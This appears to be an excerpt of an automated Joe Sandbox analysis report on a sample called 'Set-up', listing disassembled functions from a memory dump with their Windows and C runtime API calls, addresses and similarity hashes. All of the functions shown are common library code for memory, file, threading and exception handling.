_encoded_null.MSVCR100(?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F4C
DecodePointer.KERNEL32(-00000004,?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F5B
_encoded_null.MSVCR100(?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F5F
DecodePointer.KERNEL32(?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F6E
DecodePointer.KERNEL32(?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F78

Part of subcall function 6BB77E18: GetModuleHandleW.KERNEL32(00000000,6BB77EDC,6BB77F98,00000018,6BBAC0CB,00000001,00000001,00000000,?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001), ref: 6BB77E1A

___crtCorExitProcess.LIBCMT ref: 6BB87405

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: DecodePointer$_encoded_null$ExitHandleModuleProcess___crt_lock
String ID:
API String ID: 729311798-0
Opcode ID: 5898cf09aa3af5439f4c8e4b1dfb1985d3e28a0d9de70ae0bdd12bc3927ed953
Instruction ID: dc3f37f5811ef6241d22605bc5d51b33098c0fd3ca1ebed714306ddf13775fd9
Opcode Fuzzy Hash: 5898cf09aa3af5439f4c8e4b1dfb1985d3e28a0d9de70ae0bdd12bc3927ed953
Instruction Fuzzy Hash: 5B313E31D043C99EDF10AFB6C98129DBBF5FB29359F1140BAD424A6150EBF94A40CFA1

Function 6BB6FD24 Relevance: 15.1, APIs: 10, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.MSVCR100(00000007,6BB6FD98,0000000C,6BB70B6B,?,00000000,?), ref: 6BB6FD32

Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E

_wcslen.LIBCMT(00000000,6BB6FD98,0000000C,6BB70B6B,?,00000000,?), ref: 6BB6FDB5
calloc.MSVCR100(00000001,00000002,00000000,6BB6FD98,0000000C,6BB70B6B,?,00000000,?), ref: 6BB6FDC0
wcscpy_s.MSVCR100(00000000,00000001,00000000), ref: 6BB6FDD7
_errno.MSVCR100(6BB6FD98,0000000C,6BB70B6B,?,00000000,?), ref: 6BB908C8
_invalid_parameter_noinfo.MSVCR100(6BB6FD98,0000000C,6BB70B6B,?,00000000,?), ref: 6BB908D2
_errno.MSVCR100 ref: 6BB908E3
_errno.MSVCR100 ref: 6BB908EE

Part of subcall function 6BB6FCB3: _wcslen.LIBCMT(00000000), ref: 6BB6FCD5
Part of subcall function 6BB6FCB3: _wcslen.LIBCMT(00000000), ref: 6BB6FCE8
Part of subcall function 6BB6FCB3: _wcsnicoll.MSVCR100(00000000,00000000,00000000), ref: 6BB6FD05

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_wcslen$CriticalEnterSection_invalid_parameter_noinfo_lock_wcsnicollcallocwcscpy_s
String ID:
API String ID: 2000213683-0
Opcode ID: 861dc683ed726b676b8ace8cfe3acddc99cffb3851ccfb14c3dd06773b626a66
Instruction ID: b610b0a19d73c0567c1077eb4504bdb88c61a8a43232b60838b72305e87ca406
Opcode Fuzzy Hash: 861dc683ed726b676b8ace8cfe3acddc99cffb3851ccfb14c3dd06773b626a66
Instruction Fuzzy Hash: 3621B071A446E5DBCB02AF78D882A9D3771EF46B94FA18461E4249F280FB7C9D418FD0

Function 6BBAABC4 Relevance: 15.1, APIs: 10, Instructions: 80librarythreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 6BBAABDB
GetModuleFileNameW.KERNEL32(6BB50000,?,00000104), ref: 6BBAABF7
LoadLibraryW.KERNEL32(?), ref: 6BBAAC08
GetLastError.KERNEL32 ref: 6BBAAC1F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBAAC3A
_CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BBAAC4B
CreateThread.KERNEL32(00000000,00000000,-00000018,6BBA0ED5,00010000,?), ref: 6BBAAC8D
GetLastError.KERNEL32 ref: 6BBAAC97
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBAACAF
_CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BBAACBD

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionLastModuleThrow$CreateFileHandleLibraryLoadNameThread
String ID:
API String ID: 475412-0
Opcode ID: 6965747911a7608edda68c4a6ef3470df01c8c0b3b800ac7cf3d1df6a207d004
Instruction ID: 416123712d450963a67b1acd92a6971fcfca8b796bf54f79988fb7eadc54cd98
Opcode Fuzzy Hash: 6965747911a7608edda68c4a6ef3470df01c8c0b3b800ac7cf3d1df6a207d004
Instruction Fuzzy Hash: 79219232A04289AFEF14AFB0CC4ABAE3778FF05344F1400B9E516D6190EB79DA449F61

Function 6BB62ADB Relevance: 15.1, APIs: 10, Instructions: 70memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapReAlloc.KERNEL32(00000000,00000000,6BBFFC34,00000000,00000000,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010), ref: 6BB62B14
malloc.MSVCR100(6BBFFC34,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?), ref: 6BB62B90
free.MSVCR100(00000000,00000000,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57), ref: 6BB8F367
_callnewh.MSVCR100(6BBFFC34,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?), ref: 6BB8F383
_callnewh.MSVCR100(6BBFFC34,00000000,00000000,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010), ref: 6BB8F394
_errno.MSVCR100(00000000,00000000,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57), ref: 6BB8F39A
_errno.MSVCR100(?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?,6BB6AA70), ref: 6BB8F3AC
GetLastError.KERNEL32(?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?,6BB6AA70), ref: 6BB8F3B3
_errno.MSVCR100(?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?,6BB6AA70), ref: 6BB8F3C4
GetLastError.KERNEL32(?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?,6BB6AA70), ref: 6BB8F3CB

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$ErrorLast_callnewh$AllocHeapfreemalloc
String ID:
API String ID: 2627451454-0
Opcode ID: 1006b4d01e6dc76d6307f727f91b63214dbfdc5e6a13243a3b0242ac514eb579
Instruction ID: 1bd465ea418b5cdbb5927138ebdced948712b8d29f6feb397ede4de943d2380c
Opcode Fuzzy Hash: 1006b4d01e6dc76d6307f727f91b63214dbfdc5e6a13243a3b0242ac514eb579
Instruction Fuzzy Hash: F81136324056A2ABDF161F78D800BAE37A4EF467E4B184979F818CB150FF3DCC408AA0

Function 6BB6DEAC Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 6BB71AE0
atol.MSVCR100(?,?,00000010,00000000,00000000,00000000), ref: 6BB8D66F

Strings

`template-parameter, xrefs: 6BB8D68F, 6BB8D6D2
void, xrefs: 6BB71AD8

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Name::operator=atol
String ID: `template-parameter$void
API String ID: 1388095176-4057429177
Opcode ID: aa1cf3c2ab7170ef76b152450d27048ff06473da2670ddb5edd734add86cf50b
Instruction ID: c897e460792f364dfc40ba0ea852d04027e1ecae27351d37eb0b0ca940161a51
Opcode Fuzzy Hash: aa1cf3c2ab7170ef76b152450d27048ff06473da2670ddb5edd734add86cf50b
Instruction Fuzzy Hash: 0E514771E442889FCF10DFA8E8909EEBBF8FB19344F60406AE515E7240EB399E45CB10

Function 6BBA5672 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6BBA5679
malloc.MSVCR100(?,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA56C3

Part of subcall function 6BB60233: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7), ref: 6BB60263

std::exception::exception.LIBCMT(?,00000001,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA56EC
_CxxThrowException.MSVCR100(?,6BB6BDD8,?,00000001,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA5701
?wait_for_multiple@event@Concurrency@@SAIPAPAV12@I_NI@Z.MSVCR100(00000000,00000002,00000001,000000FF,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA5736
_freea_s.MSVCR100(00000000,00000000,00000002,00000001,000000FF,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA573C
?wait@event@Concurrency@@QAEII@Z.MSVCR100(000000FF,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA574B

Strings

bad allocation, xrefs: 6BBA56E5

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Concurrency@@$?wait@event@?wait_for_multiple@event@AllocateExceptionH_prolog3_HeapThrowV12@_freea_smallocstd::exception::exception
String ID: bad allocation
API String ID: 2067162669-2104205924
Opcode ID: 945190f58df9628e08d066e6147688700127e8be6291d47772984438fe253cdc
Instruction ID: 79c6b021737876004210a56dcaf2a6f948602368e53207160c8d9482767c27d9
Opcode Fuzzy Hash: 945190f58df9628e08d066e6147688700127e8be6291d47772984438fe253cdc
Instruction Fuzzy Hash: 0D21E0B2D046969FDB14CF68CC82E9D73B5EF45760F510264E964AB280EB3CEE41CB64

Function 6BB769D5 Relevance: 13.7, APIs: 9, Instructions: 226COMMON

Download Yara Rule

APIs

_memset.LIBCMT(?,000000FF,00000024,?,?,6BB769D0,?), ref: 6BB769F5
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB76A30
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB76AED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB76B46
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB76B63
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB76B86
_errno.MSVCR100(?,?,6BB769D0,?), ref: 6BB89D32
_invalid_parameter_noinfo.MSVCR100(?,?,6BB769D0,?), ref: 6BB89D3C
_errno.MSVCR100(?,?,?,?,6BB769D0,?), ref: 6BB89D56

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$_errno$_invalid_parameter_noinfo_memset
String ID:
API String ID: 1299486453-0
Opcode ID: e3baffa2ddadfa9d967ca9fabea6f8f3804a15962311de9151bfec8c21b309fe
Instruction ID: aded8c9474d202b2ad29586e8f3a378098250f375417ddc929c127d82751ef05
Opcode Fuzzy Hash: e3baffa2ddadfa9d967ca9fabea6f8f3804a15962311de9151bfec8c21b309fe
Instruction Fuzzy Hash: 02613571A00645AFDB24AF78CC41BAE77B6EB85328F10817DF522DB2D1E779E9008B44

Function 6BB6AD86 Relevance: 13.7, APIs: 9, Instructions: 200COMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32(?), ref: 6BB6AD93
_calloc_crt.MSVCR100(00000020,00000040), ref: 6BB6AD9F
GetStdHandle.KERNEL32(-000000F6), ref: 6BB6AE36
GetFileType.KERNEL32(00000000), ref: 6BB6AE50
InitializeCriticalSectionAndSpinCount.KERNEL32(-6BC03734,00000FA0), ref: 6BB6AE80
SetHandleCount.KERNEL32 ref: 6BB6AEA1

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: CountHandle$CriticalFileInfoInitializeSectionSpinStartupType_calloc_crt
String ID:
API String ID: 1159209115-0
Opcode ID: 7e5e5502ae922cad349e466ed40e7a249658455d8d88d7f9a4718591cab03983
Instruction ID: baf5aed3cc59be63247c344e243300141cf3de74dcd5122e199172c75d173767
Opcode Fuzzy Hash: 7e5e5502ae922cad349e466ed40e7a249658455d8d88d7f9a4718591cab03983
Instruction Fuzzy Hash: C7713572904B918FDB208F28C888B1977F4EF4A760F2947A9D576CB2E1E739D941CB41

Function 6BB642DE Relevance: 13.7, APIs: 9, Instructions: 169COMMON

Download Yara Rule

APIs

_fileno.MSVCR100(?), ref: 6BB890CA
_fileno.MSVCR100(?), ref: 6BB890DB
_fileno.MSVCR100(?), ref: 6BB890E7
_fileno.MSVCR100(?,?), ref: 6BB890F7
_fileno.MSVCR100(?), ref: 6BB8911A
_fileno.MSVCR100(?), ref: 6BB89126
_fileno.MSVCR100(?), ref: 6BB89132
_fileno.MSVCR100(?,?), ref: 6BB89142

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _fileno
String ID:
API String ID: 467780811-0
Opcode ID: 9b231a6de945202ccafceaf37972a969a298d2328f53e03365b381c6f1b9ce8a
Instruction ID: 2d6a5cce87c115d63fa3eb31359a1b6adffbc895d0599f49be968dd4383abd5a
Opcode Fuzzy Hash: 9b231a6de945202ccafceaf37972a969a298d2328f53e03365b381c6f1b9ce8a
Instruction Fuzzy Hash: 3851E132504B82DFCB259F28C845A9A73F0EF4A368B144969D5B59B291E33CEA45CB40

Function 6BB72E42 Relevance: 13.7, APIs: 9, Instructions: 165COMMONLIBRARYCODE

Download Yara Rule

APIs

memcpy_s.MSVCR100(?,?,?,?), ref: 6BB72EEB
_errno.MSVCR100 ref: 6BB88C29
_invalid_parameter_noinfo.MSVCR100 ref: 6BB88C34
_memset.LIBCMT(?,00000000,?), ref: 6BB88C47
_fileno.MSVCR100(?,?,?), ref: 6BB88CA3
_read.MSVCR100(00000000,?,?), ref: 6BB88CAA
_memset.LIBCMT(?,00000000,000000FF), ref: 6BB88CD4
_errno.MSVCR100 ref: 6BB88CDC

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_memset$_fileno_invalid_parameter_noinfo_readmemcpy_s
String ID:
API String ID: 4008029522-0
Opcode ID: a068426ed4a9256c8f7709657f9dc5e33b02665cc90f0d207b602e5e90d0fa0d
Instruction ID: 47a09931707bc8010b5b6fdcbb5e95d577fa9a0f81035319f5178f51fa11e0f9
Opcode Fuzzy Hash: a068426ed4a9256c8f7709657f9dc5e33b02665cc90f0d207b602e5e90d0fa0d
Instruction Fuzzy Hash: B6510471A01689EBCB309FB9CD8069EB7B1EF42360F1086B9E835962C4D7789A51CF51

Function 6BB703E4 Relevance: 13.6, APIs: 9, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.MSVCR100(6BB71022,?,?,?,6BB71022,00000040,?), ref: 6BB703EF
_write.MSVCR100(6BB71022,FFFF94F1,00000000,00000000,6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB7045D
__p__iob.MSVCR100(6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB72ACF
__p__iob.MSVCR100(6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB72ADF
_errno.MSVCR100(?,?,?,6BB71022,00000040,?), ref: 6BB888CD
_errno.MSVCR100(?,?,?,6BB71022,00000040,?), ref: 6BB888E4
_isatty.MSVCR100(6BB71022,6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB8890B
__lseeki64.LIBCMT(6BB71022,00000000,00000000,00000002,00000000,6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB88928
_write.MSVCR100(6BB71022,00000040,00000001,00000000,6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB88948

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: __p__iob_errno_write$__lseeki64_fileno_isatty
String ID:
API String ID: 2198290031-0
Opcode ID: 844f373269ff8debc2d0053b621d158c540e53a49e1ce14d5808154362f16935
Instruction ID: 0ffebab46c5051af86efb9b47fd9fbec57792789ee15fdd42265eb8932f8f810
Opcode Fuzzy Hash: 844f373269ff8debc2d0053b621d158c540e53a49e1ce14d5808154362f16935
Instruction Fuzzy Hash: DE41DF728047819FD7309F38CC81A5A77A0EF46364B60C66EE4B99B2D0E73CE900CB51

Function 6BB739A1 Relevance: 13.6, APIs: 9, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.MSVCR100(?,?,?,?,6BB73AA1,?,?), ref: 6BB739AC
__p__iob.MSVCR100(6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB739EE
__p__iob.MSVCR100(6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB739FE
_errno.MSVCR100(?,?,?,6BB73AA1,?,?), ref: 6BB88964
_errno.MSVCR100(?,?,?,6BB73AA1,?,?), ref: 6BB8897D
_isatty.MSVCR100(?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB889A5
_write.MSVCR100(?,?,?,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB889B4
__lseeki64.LIBCMT(?,00000000,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB889D2

Part of subcall function 6BB6CF2C: _malloc_crt.MSVCR100(00001000,?,6BB73A14,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB6CF36

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: __p__iob_errno$__lseeki64_fileno_isatty_malloc_crt_write
String ID:
API String ID: 2248077258-0
Opcode ID: daf2732758cc83c5255265f7ff3e06489dfb419d811ee798678a2f33d9577e79
Instruction ID: 44ee0c58a3c77e9ec2e5c41fa0966a4a10638bb911257457eae19b70b7eec3b0
Opcode Fuzzy Hash: daf2732758cc83c5255265f7ff3e06489dfb419d811ee798678a2f33d9577e79
Instruction Fuzzy Hash: 4941AE72900781AFDB309F68CC42B5977A0EF45364F10966DE4B69B690E73CE901CB52

Function 6BBA1519 Relevance: 13.6, APIs: 9, Instructions: 122COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCR100(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA152F
CloseHandle.KERNEL32(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA153B
??3@YAXPAX@Z.MSVCR100(00000000,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA156C
InterlockedFlushSList.KERNEL32(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA1585
InterlockedFlushSList.KERNEL32(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA15B4

Part of subcall function 6BBA1664: ??3@YAXPAX@Z.MSVCR100(?,?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002), ref: 6BBA1680
Part of subcall function 6BBA1664: _memset.LIBCMT(?,00000000,00000000,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152), ref: 6BBA16A1
Part of subcall function 6BBA1664: ??3@YAXPAX@Z.MSVCR100(?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?), ref: 6BBA16AC
Part of subcall function 6BBA1664: ??3@YAXPAX@Z.MSVCR100(?,?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002), ref: 6BBA16B2

?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100(?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA1600
SetEvent.KERNEL32(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?), ref: 6BBA163C
CloseHandle.KERNEL32(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?), ref: 6BBA1645
??3@YAXPAX@Z.MSVCR100(00000000,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?), ref: 6BBA164C

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: ??3@$CloseFlushHandleInterlockedList$AcquireConcurrency@@EventLock@details@ReaderWrite@_Writer_memset
String ID:
API String ID: 2332770512-0
Opcode ID: 30ded1bac8dd10b14a3ced18344df2429cc740bddb6e88c1af16c554b44c88f9
Instruction ID: 9d993ba7496f38fc070b36fc1204c4db40a3e92e62f09e6eb431beb8849a219a
Opcode Fuzzy Hash: 30ded1bac8dd10b14a3ced18344df2429cc740bddb6e88c1af16c554b44c88f9
